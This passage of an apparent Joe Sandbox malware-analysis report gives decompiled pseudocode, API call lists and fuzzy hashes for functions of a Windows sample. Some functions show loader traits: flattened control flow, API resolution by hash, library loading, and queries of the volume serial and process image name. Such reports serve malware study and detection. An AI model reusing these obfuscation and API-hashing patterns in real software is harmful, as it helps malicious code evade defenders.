					_t9 = SetWindowsHookExA(0xffffffff, E00412A65, 0, GetCurrentThreadId()); // executed
					_push(E00424441);
					 *(_t7 + 0x30) = _t9;
					_t18 = E00425D27(0x439c50);
					if( *((intOrPtr*)(_t18 + 0x14)) != 0) {
						 *((intOrPtr*)(_t18 + 0x14))( *((intOrPtr*)(E00424BFB() + 8)));
					}
					return E00425C92(0x439c4c, E00424456);
				}
				return _t6;
			}

0x00412710
0x00412719
0x0041271c
0x00412733
0x00412739
0x00412743
0x0041274b
0x00412751
0x0041275b
0x0041275b
0x00000000
0x0041276d
0x0041276e

APIs

GetCurrentThreadId.KERNEL32 ref: 00412723
SetWindowsHookExA.USER32 ref: 00412733

Part of subcall function 00425D27: __EH_prolog.LIBCMT ref: 00425D2C

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CurrentH_prologHookThreadWindows
String ID:
API String ID: 2183259885-0
Opcode ID: 82dfa06e578934c154c706557db465714f2c1539f2333c53d4548f0f4d9798f3
Instruction ID: e1aa810c2eef3cfbe5d0c04a06800172916402ab6d7e5109c2f22e34ec283244
Opcode Fuzzy Hash: 82dfa06e578934c154c706557db465714f2c1539f2333c53d4548f0f4d9798f3
Instruction Fuzzy Hash: 59F020313006302BCB307B70BA0EB5A2A90DF44318F804A1BF0619A0E2CBBC8C80C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040796F, Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040796F(intOrPtr _a4) {
				void* _t6;
				void* _t9;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x43b63c = _t6;
				if(_t6 == 0) {
					L3:
					return 0;
				} else {
					if(E00407A4A() != 0) {
						_t9 = 1;
						return _t9;
					} else {
						HeapDestroy( *0x43b63c);
						goto L3;
					}
				}
			}

0x00407980
0x00407988
0x0040798d
0x004079a4
0x004079a6
0x0040798f
0x00407996
0x004079a9
0x004079aa
0x00407998
0x0040799e
0x00000000
0x0040799e
0x00407996

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,004063E6,00000001), ref: 00407980

Part of subcall function 00407A4A: HeapAlloc.KERNEL32(00000000,00000140,00407994), ref: 00407A57

HeapDestroy.KERNEL32 ref: 0040799E

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Heap$AllocCreateDestroy
String ID:
API String ID: 2236781399-0
Opcode ID: 645681982fc8d61ddb20c8e825624fd1c02a5afe8e3a61baadfadfb8e0cb624d
Instruction ID: 148b4dcf31a7c6b17fb8364a85278eb553451c51f0f99df079208ecffef983c8
Opcode Fuzzy Hash: 645681982fc8d61ddb20c8e825624fd1c02a5afe8e3a61baadfadfb8e0cb624d
Instruction Fuzzy Hash: 26E012B0755301AEEB101B31AC0677A36D4DB54782F149436F544D41F4E7B895519A4B

Uniqueness

Uniqueness Score: -1.00%

Function 02241D10, Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.931652161.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2241000_sort.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9545f8edc284a04ee22b93235bf47441e87eb3a6228b08b4c274475cc7a75685
Instruction ID: ff9857c0712c6e1112d8b5370d49a049735d10264352e80dd8ee9bb8213dcaa2
Opcode Fuzzy Hash: 9545f8edc284a04ee22b93235bf47441e87eb3a6228b08b4c274475cc7a75685
Instruction Fuzzy Hash: 2D41BA78A10109EFDB08CF94C494BAAB7B2FF88314F14C159E8195F359C775EA92CB80

Uniqueness

Uniqueness Score: -1.00%

Function 02276FB0, Relevance: 1.6, APIs: 1, Instructions: 107
libraryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E02276FB0(void* __ebx) {
				void* _t2;
				struct HINSTANCE__* _t5;
				intOrPtr* _t6;
				intOrPtr* _t8;
				void* _t21;
				intOrPtr _t28;
				void* _t48;
				WCHAR* _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				_t21 = __ebx;
				_t2 = 0x2f7561b9;
				goto L1;
				do {
					while(1) {
						L1:
						_t54 = _t2 - 0x16eb9dc5;
						if(_t54 > 0) {
							break;
						}
						if(_t54 == 0) {
							E02276F10(_t21, 0x227d770, 4, __eflags);
							_t2 = 0x28da268b;
							continue;
						} else {
							_t55 = _t2 - 0x96aa655;
							if(_t55 > 0) {
								__eflags = _t2 - 0x129c963b;
								if(__eflags != 0) {
									goto L21;
								} else {
									E02276F10(_t21, 0x227d7c0, 3, __eflags);
									_t2 = 0x16eb9dc5;
									continue;
								}
							} else {
								if(_t55 == 0) {
									E02276F10(_t21, 0x227d840, 1, __eflags);
									_t2 = 0x6462a46;
									continue;
								} else {
									if(_t2 == 0x34398df) {
										E02276F10(_t21, 0x227d820, 0, __eflags);
										_t2 = 0x96aa655;
										continue;
									} else {
										_t57 = _t2 - 0x6462a46;
										if(_t2 != 0x6462a46) {
											goto L21;
										} else {
											E02276F10(_t21, 0x227d890, 2, _t57);
											_t2 = 0x129c963b;
											continue;
										}
									}
								}
							}
						}
						L30:
					}
					__eflags = _t2 - 0x2cd0d411;
					if(__eflags > 0) {
						__eflags = _t2 - 0x2f7561b9;
						if(__eflags != 0) {
							goto L21;
						} else {
							_t2 = 0x34398df;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							_t51 = E022734C0(0x227d7f0);
							__eflags =  *0x227ddc4;
							if( *0x227ddc4 == 0) {
								 *0x227ddc4 = E02273E80(_t21, E02273F20(0xbb398380), 0x9261db99, _t53);
							}
							_t5 = LoadLibraryW(_t51);
							_t28 =  *0x227e2e8; // 0x4c3710
							 *(_t28 + 0x28) = _t5;
							_t6 =  *0x227dea8;
							__eflags = _t6;
							if(_t6 == 0) {
								_t6 = E02273E80(_t21, E02273F20(0xbb398380), 0x97f883e, _t53);
								 *0x227dea8 = _t6;
							}
							_t48 =  *_t6();
							_t8 =  *0x227e1a0;
							__eflags = _t8;
							if(_t8 == 0) {
								_t8 = E02273E80(_t21, E02273F20(0xbb398380), 0x26c3f343, _t53);
								 *0x227e1a0 = _t8;
							}
							return  *_t8(_t48, 0, _t51);
						} else {
							__eflags = _t2 - 0x17b18c59;
							if(__eflags == 0) {
								E02276F10(_t21, 0x227d870, 6, __eflags);
								_t2 = 0x2cd0d411;
								goto L1;
							} else {
								__eflags = _t2 - 0x28da268b;
								if(__eflags != 0) {
									goto L21;
								} else {
									E02276F10(_t21, 0x227d790, 5, __eflags);
									_t2 = 0x17b18c59;
									goto L1;
								}
							}
						}
					}
					goto L30;
					L21:
					__eflags = _t2 - 0x2a0eb481;
				} while (__eflags != 0);
				return _t2;
				goto L30;
			}

0x02276fb0
0x02276fb0
0x02276fb0
0x02276fb5
0x02276fb5
0x02276fb5
0x02276fb5
0x02276fba
0x00000000
0x00000000
0x02276fc0
0x0227704a
0x0227704f
0x00000000
0x02276fc2
0x02276fc2
0x02276fc7
0x0227701c
0x02277021
0x00000000
0x02277027
0x02277031
0x02277036
0x00000000
0x02277036
0x02276fc9
0x02276fc9
0x02277010
0x02277015
0x00000000
0x02276fcb
0x02276fd0
0x02276ffa
0x02276fff
0x00000000
0x02276fd2
0x02276fd2
0x02276fd7
0x00000000
0x02276fdd
0x02276fe7
0x02276fec
0x00000000
0x02276fec
0x02276fd7
0x02276fd0
0x02276fc9
0x02276fc7
0x00000000
0x02276fc0
0x02277059
0x0227705e
0x022770a2
0x022770a7
0x00000000
0x022770a9
0x022770a9
0x00000000
0x022770a9
0x02277060
0x02277060
0x022770cb
0x022770d2
0x022770d4
0x022770ec
0x022770ec
0x022770f2
0x022770f4
0x022770fa
0x022770fd
0x02277102
0x02277104
0x02277117
0x0227711c
0x0227711c
0x02277123
0x02277125
0x0227712a
0x0227712c
0x0227713f
0x02277144
0x02277144
0x02277151
0x02277062
0x02277062
0x02277067
0x02277093
0x02277098
0x00000000
0x02277069
0x02277069
0x0227706e
0x00000000
0x02277070
0x0227707a
0x0227707f
0x00000000
0x0227707f
0x0227706e
0x02277067
0x02277060
0x00000000
0x022770b3
0x022770b3
0x022770b3
0x022770be
0x00000000

APIs

LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,022768DC), ref: 022770F2

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2e662c5924742044905ec9a1a0c30b9eaaacfb7378e43bb22e95fd4c41e42fac
Instruction ID: 0775aa566c03458f65ddcb663382587c7b4a1a4665f1be3c4e7d070791f95fbb
Opcode Fuzzy Hash: 2e662c5924742044905ec9a1a0c30b9eaaacfb7378e43bb22e95fd4c41e42fac
Instruction Fuzzy Hash: F631A120B3D6035BDA28AAF9689437B515B9B81244F640C6AF007CB35CDFB5CD018BE3

Uniqueness

Uniqueness Score: -1.00%

Function 022746F0, Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E022746F0(void* __ebx, void* __edx, void* __ebp) {
				char _v16;
				void* __ecx;
				intOrPtr* _t2;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr* _t7;
				void* _t14;
				void* _t27;
				void* _t29;
				void* _t32;
				void* _t33;
				intOrPtr* _t37;

				_t36 = __ebp;
				_t13 = __ebx;
				_t2 =  *0x227dea4;
				 *_t37 = 0x104;
				_t32 = _t14;
				_t27 = __edx;
				if(_t2 == 0) {
					_t2 = E02273E80(__ebx, E02273F20(0xbb398380), 0x4791debe, __ebp);
					 *0x227dea4 = _t2;
				}
				_t33 =  *_t2(0x1000, 0, _t32);
				if(_t33 == 0) {
					return 0;
				} else {
					_t5 =  *0x227df2c;
					if(_t5 == 0) {
						_t5 = E02273E80(_t13, E02273F20(0xbb398380), 0xd0ee7032, _t36);
						 *0x227df2c = _t5;
					}
					_t6 =  *_t5(_t33, 0, _t27,  &_v16); // executed
					_t29 = _t6;
					_t7 =  *0x227dc70;
					if(_t7 == 0) {
						_t7 = E02273E80(_t13, E02273F20(0xbb398380), 0x560d239b, _t36);
						 *0x227dc70 = _t7;
					}
					 *_t7(_t33);
					return _t29;
				}
			}

0x022746f0
0x022746f0
0x022746f1
0x022746f6
0x022746fe
0x02274701
0x02274705
0x02274718
0x0227471d
0x0227471d
0x0227472c
0x02274730
0x02274795
0x02274732
0x02274732
0x02274739
0x0227474c
0x02274751
0x02274751
0x0227475f
0x02274761
0x02274763
0x0227476a
0x0227477d
0x02274782
0x02274782
0x02274788
0x0227478f
0x0227478f

APIs

QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,2564BE4F), ref: 0227475F

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: aea155e6f094eb6659221f1e99f0ed86a9f789231878d376b312f9f35fa16965
Instruction ID: 8d1063aa29eecb05ac15ffa3f77f0ca3387fcd666b95b60f2bb2433c27ff2b15
Opcode Fuzzy Hash: aea155e6f094eb6659221f1e99f0ed86a9f789231878d376b312f9f35fa16965
Instruction Fuzzy Hash: 4701C475B192126BD314AAF9BC14BAB22E7AFC4291B04046DF445CB248EF708C015BD2

Uniqueness

Uniqueness Score: -1.00%

Function 02275490, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E02275490(void* __ebx, void* __ebp) {
				char _v520;
				short _v528;
				long _v532;
				intOrPtr* _t7;
				short* _t10;
				WCHAR** _t28;

				_t27 = __ebp;
				_t16 = __ebx;
				_t7 =  *0x227e1b8;
				 *_t28 = 0;
				if(_t7 == 0) {
					_t7 = E02273E80(__ebx, E02273F20(0xbb398380), 0x61bf6c0c, __ebp);
					 *0x227e1b8 = _t7;
				}
				_push(0x104);
				_push( &_v520);
				if( *_t7() != 0) {
					_t10 =  &_v528;
					if(_v528 != 0) {
						while( *_t10 != 0x5c) {
							_t10 = _t10 + 2;
							if( *_t10 != 0) {
								continue;
							} else {
							}
							goto L9;
						}
						 *((short*)(_t10 + 2)) = 0;
					}
					L9:
					if( *0x227e23c == 0) {
						 *0x227e23c = E02273E80(_t16, E02273F20(0xbb398380), 0x8837cb40, _t27);
					}
					GetVolumeInformationW( &_v528, 0, 0,  &_v532, 0, 0, 0, 0); // executed
				}
				return _v532;
			}

0x02275490
0x02275490
0x02275496
0x0227549b
0x022754a4
0x022754b7
0x022754bc
0x022754bc
0x022754c1
0x022754ca
0x022754cf
0x022754d7
0x022754db
0x022754e0
0x022754e6
0x022754ed
0x00000000
0x00000000
0x022754ef
0x00000000
0x022754ed
0x022754f3
0x022754f3
0x022754f7
0x022754fe
0x02275516
0x02275516
0x02275531
0x02275531
0x0227553c

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02275531

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 55fdc9d052731fc282da4a5a7549b93eabb3038366ce06122490072e4a1eb6ca
Instruction ID: 9f785f36f9858f834ea9992808b7799b5a73dbd8b4d162bafa2ea8797060c53d
Opcode Fuzzy Hash: 55fdc9d052731fc282da4a5a7549b93eabb3038366ce06122490072e4a1eb6ca
Instruction Fuzzy Hash: E311A970A68301ABE714DBE4D856B76B3E1BF80704F84445CF945CB1D4EBB4D954CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02276F10, Relevance: 1.5, APIs: 1, Instructions: 45
libraryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E02276F10(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t9;
				intOrPtr _t17;
				signed int _t28;
				void* _t29;
				WCHAR* _t30;
				void* _t31;

				_t15 = __ebx;
				_t28 = __edx;
				_t30 = E022734C0(__ecx);
				if( *0x227ddc4 == 0) {
					 *0x227ddc4 = E02273E80(__ebx, E02273F20(0xbb398380), 0x9261db99, _t31);
				}
				_t6 = LoadLibraryW(_t30);
				_t17 =  *0x227e2e8; // 0x4c3710
				 *(_t17 + 0xc + _t28 * 4) = _t6;
				_t7 =  *0x227dea8;
				if(_t7 == 0) {
					_t7 = E02273E80(_t15, E02273F20(0xbb398380), 0x97f883e, _t31);
					 *0x227dea8 = _t7;
				}
				_t29 =  *_t7();
				_t9 =  *0x227e1a0;
				if(_t9 == 0) {
					_t9 = E02273E80(_t15, E02273F20(0xbb398380), 0x26c3f343, _t31);
					 *0x227e1a0 = _t9;
				}
				return  *_t9(_t29, 0, _t30);
			}

0x02276f10
0x02276f12
0x02276f19
0x02276f22
0x02276f3a
0x02276f3a
0x02276f40
0x02276f42
0x02276f48
0x02276f4c
0x02276f53
0x02276f66
0x02276f6b
0x02276f6b
0x02276f72
0x02276f74
0x02276f7b
0x02276f8e
0x02276f93
0x02276f93
0x02276fa0

APIs

LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,0227704F,022768DC), ref: 02276F40

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af66ff68ff6703f581d0c46feb864e968d76eb93a4849651938e98228bfd1057
Instruction ID: e5d90bf04a594fc78671ca0c20808e4f4b0688da0a9d3558a837eace8f73ef2a
Opcode Fuzzy Hash: af66ff68ff6703f581d0c46feb864e968d76eb93a4849651938e98228bfd1057
Instruction Fuzzy Hash: 00012C75B1A201AB9714FAF5B85867B22E7AFC02947040CA9F006CB348EF349C115BE2

Uniqueness

Uniqueness Score: -1.00%

Function 022427B0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 022427D9

Memory Dump Source

Source File: 00000001.00000002.931652161.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2241000_sort.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 09f7b03f767fc6b5f5d37a16990802a561865b3b8342087b0e892af978a46395
Instruction ID: 9a224a3fd580898107edc29c4d892f0576f0d550ea0600f0b21849f83c48856d
Opcode Fuzzy Hash: 09f7b03f767fc6b5f5d37a16990802a561865b3b8342087b0e892af978a46395
Instruction Fuzzy Hash: 8FD05B74D50208FFD704EFD4E505B5CBBF4EB04301F104154E90457244E6706E14CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00408198, Relevance: 1.3, APIs: 1, Instructions: 85
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00408198(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _t45;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t54;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				void* _t69;
				void* _t70;
				void* _t77;
				signed int _t78;
				intOrPtr _t81;

				_t60 = _a4;
				_t81 =  *((intOrPtr*)(_t60 + 0x10));
				_t45 =  *(_t60 + 8);
				_t57 = 0;
				while(_t45 >= 0) {
					_t45 = _t45 << 1;
					_t57 = _t57 + 1;
				}
				_t69 = 0x3f;
				_t48 = _t57 * 0x204 + _t81 + 0x144;
				_v8 = _t48;
				do {
					 *((intOrPtr*)(_t48 + 8)) = _t48;
					 *((intOrPtr*)(_t48 + 4)) = _t48;
					_t48 = _t48 + 8;
					_t69 = _t69 - 1;
				} while (_t69 != 0);
				_t77 = (_t57 << 0xf) +  *((intOrPtr*)(_t60 + 0xc));
				_t49 = VirtualAlloc(_t77, 0x8000, 0x1000, 4); // executed
				if(_t49 != 0) {
					_t70 = _t77 + 0x7000;
					if(_t77 <= _t70) {
						_t55 = _t77 + 0x10;
						do {
							 *(_t55 - 8) =  *(_t55 - 8) | 0xffffffff;
							 *(_t55 + 0xfec) =  *(_t55 + 0xfec) | 0xffffffff;
							 *((intOrPtr*)(_t55 - 4)) = 0xff0;
							 *_t55 = _t55 + 0xffc;
							 *((intOrPtr*)(_t55 + 4)) = _t55 - 0x1004;
							 *((intOrPtr*)(_t55 + 0xfe8)) = 0xff0;
							_t55 = _t55 + 0x1000;
						} while (_t55 - 0x10 <= _t70);
					}
					_t61 = _t77 + 0xc;
					_t51 = _v8 + 0x1f8;
					_t78 = 1;
					 *((intOrPtr*)(_t51 + 4)) = _t61;
					 *((intOrPtr*)(_t61 + 8)) = _t51;
					_t62 = _t70 + 0xc;
					 *((intOrPtr*)(_t51 + 8)) = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t51;
					 *(_t81 + 0x44 + _t57 * 4) =  *(_t81 + 0x44 + _t57 * 4) & 0x00000000;
					 *(_t81 + 0xc4 + _t57 * 4) = _t78;
					_t52 =  *((intOrPtr*)(_t81 + 0x43));
					_t53 = _a4;
					 *((char*)(_t81 + 0x43)) = _t52 + 1;
					if(_t52 == 0) {
						 *(_t53 + 4) =  *(_t53 + 4) | _t78;
					}
					 *(_t53 + 8) =  *(_t53 + 8) &  !(0x80000000 >> _t57);
					_t54 = _t57;
				} else {
					_t54 = _t49 | 0xffffffff;
				}
				return _t54;
			}

APIs

VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,00000000,00000000,000000E0,?,?,00407EBE,000000E0,00000000,?,?,?,004063F8), ref: 004081E9

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c10341eec60ebe6bbb32a5452224be3c98b41b110d200c327e5e4d1bcbefa23c
Instruction ID: a951a9915c6437c0f42f98627e617b565139ecfdaa8fc563ef3f50a1ca92f44d
Opcode Fuzzy Hash: c10341eec60ebe6bbb32a5452224be3c98b41b110d200c327e5e4d1bcbefa23c
Instruction Fuzzy Hash: FC319A316006068FD314CF18C984BA5BBE0FF50364F2482BED5598B3E2DB74A906CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00407333, Relevance: 1.3, APIs: 1, Instructions: 56
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E00407333(signed int _a4, signed int _a8) {
				void* _t8;
				long _t11;
				void* _t13;
				long _t15;
				void* _t17;
				void* _t23;

				_t15 = _a4 * _a8;
				_t11 = _t15;
				if(_t15 <= 0xffffffe0) {
					if(_t15 == 0) {
						_t15 = 1;
					}
					_t15 = _t15 + 0x0000000f & 0xfffffff0;
				}
				while(1) {
					_t13 = 0;
					if(_t15 > 0xffffffe0) {
						goto L8;
					}
					_t23 = _t11 -  *0x436fa8; // 0x3f8
					if(_t23 > 0) {
						L7:
						_t13 = HeapAlloc( *0x43b63c, 8, _t15);
						if(_t13 != 0) {
							L12:
							return _t13;
						}
						goto L8;
					}
					E004079D4(9);
					_push(_t11); // executed
					_t8 = E00407DDE(); // executed
					_t13 = _t8;
					E00407A35(9);
					_t17 = _t17 + 0xc;
					if(_t13 != 0) {
						E00406330(_t13, 0, _t11);
						goto L12;
					}
					goto L7;
					L8:
					if( *0x439d64 == 0) {
						goto L12;
					}
					if(E00407954(_t15) == 0) {
						return 0;
					}
				}
			}

APIs

HeapAlloc.KERNEL32(00000008,?,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407388

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: d8ddc1c96428b364bc5c95c0131a8b9d5b49fa79595c9ac96bb98cb66cd96fa8
Instruction ID: 3f3aad503001cd6b8f63a7fd222fe274e9ba08c9a4469d1d6c832ccce610b396
Opcode Fuzzy Hash: d8ddc1c96428b364bc5c95c0131a8b9d5b49fa79595c9ac96bb98cb66cd96fa8
Instruction Fuzzy Hash: B901F522E086106AF62166296C42B6B22059B807A9F1A0137FE54772D2D6787C01E1EF

Uniqueness

Uniqueness Score: -1.00%

Function 02241820, Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 0224182F

Memory Dump Source

Source File: 00000001.00000002.931652161.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2241000_sort.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 38dc218105373fd44773c0c130e0d4746c7c4daf83264b01d4a4c4a7fa72be85
Instruction ID: 64282340d9f3295d39147d2fd07414a40987247c4e94170d017205eebe5a0f09
Opcode Fuzzy Hash: 38dc218105373fd44773c0c130e0d4746c7c4daf83264b01d4a4c4a7fa72be85
Instruction Fuzzy Hash: A0C04C7A55420CAB8B04DFD8F884DAB37FDBB8C714B148548BA1D87200C630F9108BA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00410E05, Relevance: 37.1, APIs: 18, Strings: 3, Instructions: 343
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00410E05(signed int __ecx) {
				signed int _t116;
				signed int _t119;
				signed int _t120;
				struct HWND__* _t124;
				signed int _t126;
				intOrPtr _t127;
				signed char _t141;
				signed int _t145;
				signed int _t149;
				signed int _t150;
				void* _t160;
				intOrPtr* _t167;
				signed int _t169;
				signed int _t182;
				signed int _t183;
				signed int _t186;
				signed int _t188;
				signed int _t198;
				void* _t200;
				signed short _t208;
				intOrPtr _t211;
				void* _t215;
				void* _t217;
				void* _t218;
				void* _t220;
				void* _t221;

				_t116 = E00406520(E0042AA5D, _t215);
				_t218 = _t217 - 0x74;
				_t167 =  *((intOrPtr*)(_t215 + 8));
				_t208 =  *(_t167 + 4);
				_t198 = __ecx;
				 *(_t215 - 0x10) = __ecx;
				 *(_t215 - 0x1c) = _t208;
				if(_t208 == 0x200 || _t208 == 0xa0 || _t208 == 0x202 || _t208 == 0x205 || _t208 == 0x208) {
					_t116 = GetKeyState(1);
					if(_t116 < 0) {
						L49:
						_t208 =  *(_t215 - 0x1c);
						goto L50;
					}
					_t116 = GetKeyState(2);
					if(_t116 < 0) {
						goto L49;
					}
					_t116 = GetKeyState(4);
					if(_t116 < 0) {
						goto L49;
					} else {
						_push( *_t167);
						L9:
						_t116 = E00413740(_t215);
						if(_t116 != 0 && ( *(_t116 + 0x24) & 0x00000401) == 0) {
							_push(GetParent( *(_t116 + 0x1c)));
							goto L9;
						}
						__eflags = _t116 - _t198;
						if(_t116 == _t198) {
							_t211 = E00425C92(0x4397cc, E0042440D);
							 *((intOrPtr*)(_t215 - 0x18)) = _t211;
							_t169 =  *(_t211 + 0xcc);
							_t119 = E00414D17(_t198);
							__eflags = _t169;
							 *(_t215 - 0x14) = _t119;
							if(_t169 == 0) {
								L19:
								_t120 = E004131DD(0x58);
								 *(_t215 - 0x1c) = _t120;
								_t169 = 0;
								__eflags = _t120;
								 *(_t215 - 4) = 0;
								if(__eflags != 0) {
									_t169 = E00410AA2(_t120);
								}
								 *(_t215 - 4) =  *(_t215 - 4) | 0xffffffff;
								_push(1);
								_t116 = E00410AF7(_t169, __eflags,  *(_t215 - 0x14));
								__eflags = _t116;
								if(_t116 != 0) {
									SendMessageA( *(_t169 + 0x1c), 0x401, 0, 0);
									_t198 =  *(_t215 - 0x10);
									 *(_t211 + 0xcc) = _t169;
									L25:
									E00406330(_t215 - 0x54, 0, 0x2c);
									_t124 =  *(_t198 + 0x1c);
									_t220 = _t218 + 0xc;
									 *(_t215 - 0x4c) = _t124;
									 *(_t215 - 0x48) = _t124;
									 *(_t215 - 0x54) = 0x28;
									 *(_t215 - 0x50) = 1;
									_t126 = SendMessageA( *(_t169 + 0x1c), 0x408, 0, _t215 - 0x54);
